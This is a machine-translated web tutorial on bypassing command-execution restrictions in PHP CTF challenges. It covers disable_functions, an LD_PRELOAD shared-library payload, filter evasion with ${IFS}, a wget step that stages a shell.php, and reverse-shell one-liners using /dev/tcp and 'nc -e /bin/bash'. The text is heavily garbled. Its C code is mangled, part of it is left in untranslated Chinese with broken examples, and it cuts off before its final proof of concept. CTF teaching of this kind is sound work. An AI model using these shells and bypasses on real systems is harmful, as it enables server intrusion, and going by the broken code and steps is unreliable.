Shulou(Shulou.com)05/31 Report--

Today, I will talk to you about how to bypass the execution of commands in CTF. Many people may not know much about it. In order to make you understand better, the editor has summarized the following contents for you. I hope you can get something according to this article.

Before introducing command injection, it is important to note that command injection is different from remote code execution. The difference between them is that remote code execution actually calls the server website code for execution, while command injection invokes operating system commands for execution.

As the most basic operation of CTF, the learning of command execution is mainly to lay the foundation for further use of webshell in the future.

Similarly, today we will show you how to use various commands to perform bypass.

First of all, let's look at code execution.

Dynamic call:

This place is once a test site for ctf, and it is also a question I gave in the strong net Cup, called "Smart Hacker", which uses confusing code + dynamic function calls, which is actually very often used in red and blue attack and defense, that is, a bunch of functions are confused, and then a dynamic function is inserted into it for real code execution or command execution.

At that time, the topic was inspired by a security response. After the hacker attacked the website, the confused code was inserted into it. Only one path in more than 1000 files was executed normally. Finally, debug was used to directly look at the call of stack memory to determine which path was really called dynamically.

Common command execution functions

Common command execution function system () passthru () exec () shell_exec () `backquotes

Back quotation mark

➜~ php-r "echo @ whoami;"

This is a command execution point that is easy to forget, and there have been a lot of questions about this recently in the ctf contest. In the second article, we will use an example to analyze his role in detail.

Command execution bypass

These are our common code injection or command injection functions, but most of the time in ctf, the questioner won't let us execute the command so easily. Therefore, we must be able to master a variety of command execution to bypass the posture.

Generally speaking, there are only two situations encountered:

Disable_function

Filter character

Disable_function

What is this thing obviously? you can execute the code, but you find that neither the ant sword nor your own hand can execute the system command. Then you read it with the function phpinfo and find the following configuration:

In fact, the developer wrote the following statement in the back-end php.ini

Disable_functions = system,exec,shell_exec,passthru,proc_open,proc_close, proc_get_status,checkdnsrr,getmxrr,getservbyname,getservbyport, syslog,popen,show_source,highlight_file,dl,socket_listen,socket_create,socket_bind,socket_accept, socket_connect, stream_socket_server, stream_socket_accept,stream_socket_client,ftp_connect, ftp_login,ftp_pasv,ftp_get,sys_getloadavg,disk_total_space, disk_free_space,posix_ctermid,posix_get_last_error Posix_getcwd, posix_getegid,posix_geteuid,posix_getgid, posix_getgrgid,posix_getgrnam,posix_getgroups,posix_getlogin,posix_getpgid,posix_getpgrp,posix_getpid, posix_getppid,posix_getpwnam,posix_getpwuid, posix_getrlimit, posix_getsid,posix_getuid,posix_isatty, posix_kill,posix_mkfifo,posix_setegid,posix_seteuid,posix_setgid, posix_setpgid,posix_setsid,posix_setuid,posix_strerror,posix_times,posix_ttyname,posix_uname

Two methods are the most commonly used.

Ld_preload

Php_gc

Ld_preload

There are few exams this year, but they are often used in red and blue attack and defense.

You need to meet the condition that the opposite side does not disable the mail function (perhaps this is one of the reasons why you do not like to take this test in the recent competition. If you disable mail, it is tantamount to examining other points, and it is very boring to use mail to bypass it in this way.) Operation method:

Hack.c

# include # include # include void payload () {system ("ls / var/www/html > / tmp/smity");} int geteuid () {if (getenv ("LD_PRELOAD") = = NULL) {return 0;} unsetenv ("LD_PRELOAD"); payload ();}

Compile the c file with the command into a .so file and pass it in through code execution (here you can use ant sword directly)

Gcc-c-fPIC hack.c-o hack gcc-- share hack-o hack.so

Then pass in the following php file

Access to the php file and you can run the command just now. You can then see the results of ls under the / tmp/smity file.

Php_gc

Judging from the two public welfare competitions, the questions of both the test sites (spring and autumn and colleges and universities) are: both easy-thinking and php-uaf have achieved code execution but no command execution, so the usual step is to use ant sword to link our shell code execution, upload the following script and then visit it, and use the phpgc process to Bypass conditions: php7.0

< 7.3 (Unix) 这里的大家可以参考这个博客，里面有比较详细的脚本，因为太长了就不贴在这里了 https://wulidecade.cn/2019/09/27/%E7%BB%95%E8%BF%87disable-function%E6%B1%87%E6%80%BB/ 过滤字符 这个限制一般是题目中允许你使用system，但是很奇怪的是你却没有办法获取执行命令的结果 比如，对面过滤了空格，你能执行ls，但是没法cat读取文件 比如，对面过滤了flag这个词语，什么文件都可以读取，就是没办法读取flag 等等，都是ctf题目做到最后，这个出题人小心思故意在这里卡你一下。这个时候你就需要试试我接下来讲的这些方法： 空格代替 空格在bash下，可以用以下字符代替空格 < ${IFS} $IFS$9 %09 root@kali:~# cat1创建文件名为1的空文件 ls>

1 you can import the contents of ls directly into a file, but it will be appended by default.

It is also a connector in linux. It was originally used in the first generation of computers whose screen could not hold more than 18 characters. It was used to connect the upper and lower lines. It is used here to bypass the restrictions.

The statement is the wget domain .com-O shell.php

Ls > a writes to the server file and then sh a reads

Pay attention here. Cannot be used as the beginning of the file name, because under linux. Is the beginning of the hidden file, which cannot be listed by ls

However, there is another problem here, that is, the file names under ls are sorted alphabetically, so the final command needs to be changed to ls-t > a based on time sorting.

As for bypassing five characters to execute commands and bypassing four characters, they are all trick made with\, which will not be repeated here.

The return length of the result of command execution is limited.

This time, there is a topic in the college campaign that reminds me that there are only so many people who can filter the problem. Well, there is another way to stop you from seeing the complete result of the command execution, such as not echoing or echoing a line. This time, the question needs to be executed with soapclient, but there is a disadvantage that it can not echo completely, only one line of results can be seen, which is very inconvenient for our command execution. And the dev file does not have permission to use, at this time we can use the following method of bouncing shell.

In fact, people like to use this command to bounce back on shell:

Bash-I > & / dev/tcp/ip/port 0 > & 1

But this is a little bad, he needs dev and bash, in fact, it will be easier to use my following command: after listening to the port

Nc-e / bin/bash ip port

In this way, you can also get shell, in fact, the essence is the same, there is not much difference, just simplified.

A classic command execution bypass

I seem to have seen this topic twice. At first, no one knows how to think, but later I found that this time many people have not learned or summed up the poc:

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.